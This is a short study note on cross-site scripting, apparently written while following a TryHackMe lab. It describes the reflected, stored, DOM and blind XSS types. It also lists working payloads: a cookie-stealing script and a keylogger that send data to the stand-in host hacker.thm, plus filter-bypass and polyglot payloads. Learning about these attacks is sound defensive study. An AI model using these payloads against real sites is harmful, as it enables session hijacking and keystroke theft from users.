Intro to Cross-site Scripting
May 18, 2025Definition
XSS is a type of injection attack that tries to execute malicious javascript code on target’s computer
Here are some examples examples for payloads for different scenarios
Payloads
Here the payload consists of two parts intention and modification
POC
<script>alert('XSS');</script>Session stealing
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>Keylogger
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
Reflected XSS
Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.
Where to search for
- URL parameters
- URL file path
- Sometimes HTTP Headers (although unlikely exploitable in practice)
Stored XSS
As the name infers, the XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.
Where to search for
- comment sections
- User profile information
- Website Listings
DOM Based XSS
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website JavaScript code acts on input or user interaction.
Blind XSS
Blind XSS is similar to a stored XSS (which we covered in task 4) in that your payload gets stored on the website for another user to view, but in this instance, you can’t see the payload working or be able to test it against yourself first.
Perfecting payloads
bypassing input field
"><script>alert('THM');</script>bypassing text area
</textarea><script>alert('THM');</script>bypassing script
';alert('THM');//bypassing word “script” filtration
<sscriptcript>alert('THM');</sscriptcript>bypassing characters “< >” filtration
/images/cat.jpg" onload="alert('THM');Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e